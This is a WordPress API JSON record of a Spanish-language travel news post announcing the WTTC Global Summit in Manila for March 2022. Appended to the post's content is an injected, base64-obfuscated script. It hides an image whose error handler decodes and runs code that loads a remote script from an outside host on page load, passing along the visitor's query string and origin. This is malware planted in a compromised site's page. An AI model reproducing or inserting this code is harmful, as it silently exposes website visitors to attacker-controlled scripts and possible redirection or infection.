{"id":4751,"date":"2021-10-11T22:28:10","date_gmt":"2021-10-12T01:28:10","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4751"},"modified":"2025-08-13T16:26:56","modified_gmt":"2025-08-13T19:26:56","slug":"wttc-confirma-que-la-cumbre-global-en-manila-tendra-lugar-en-marzo-de-2022","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4751","title":{"rendered":"WTTC confirma que la Cumbre Global en Manila tendr\u00e1 lugar en marzo de 2022"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">El Consejo Mundial de Viajes y Turismo ha anunciado que su muy esperado evento\u00a0anual se llevar\u00e1 a cabo del 14 al 16 de marzo<\/h3>\n\n\n\n<p>El Consejo Mundial de Viajes y Turismo (\u00a0WTTC\u00a0), que representa al sector privado mundial de Viajes y Turismo, ha anunciado que su muy esperada 21\u00aa Cumbre Global se llevar\u00e1 a cabo en Manila, Filipinas, del 14 al 16 de marzo de 2022.<br>\u00a0<br>La Cumbre Global anual del WTTC es la El evento de viajes y turismo m\u00e1s influyente del calendario, y el pr\u00f3ximo a\u00f1o, los l\u00edderes de la industria se reunir\u00e1n con representantes gubernamentales clave para continuar alineando esfuerzos para apoyar la recuperaci\u00f3n del sector y avanzar hacia un futuro m\u00e1s seguro, m\u00e1s resiliente, inclusivo y sostenible.<br>\u00a0<br>Despu\u00e9s de su evento de gran \u00e9xito en Canc\u00fan M\u00e9xico este a\u00f1o, la Cumbre se llevar\u00e1 a cabo en Metro Manila en persona, con una audiencia global que se unir\u00e1 virtualmente.<br>\u00a0<br>En breve se anunciar\u00e1 m\u00e1s informaci\u00f3n, como el tema de la Cumbre y los principales oradores<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/es.travel2latam.com\/nota\/70472-eventos-wttc-confirma-que-la-cumbre-global-en-manila-tendra-lugar-en-marzo-de-2022.html\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/06\/travel2latam.logo_.gif\" alt=\"\" class=\"wp-image-4477\" width=\"152\" height=\"58\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Consejo Mundial de Viajes y Turismo ha anunciado que su muy esperado evento\u00a0anual se llevar\u00e1 a cabo del 14 al 16 de marzo El Consejo Mundial de Viajes y Turismo (\u00a0WTTC\u00a0), que representa al sector privado mundial de Viajes y Turismo, ha anunciado que su muy esperada 21\u00aa Cumbre Global se llevar\u00e1 a cabo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4752,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29,12],"tags":[],"class_list":["post-4751","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4751"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4751\/revisions"}],"predecessor-version":[{"id":10766,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4751\/revisions\/10766"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4752"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}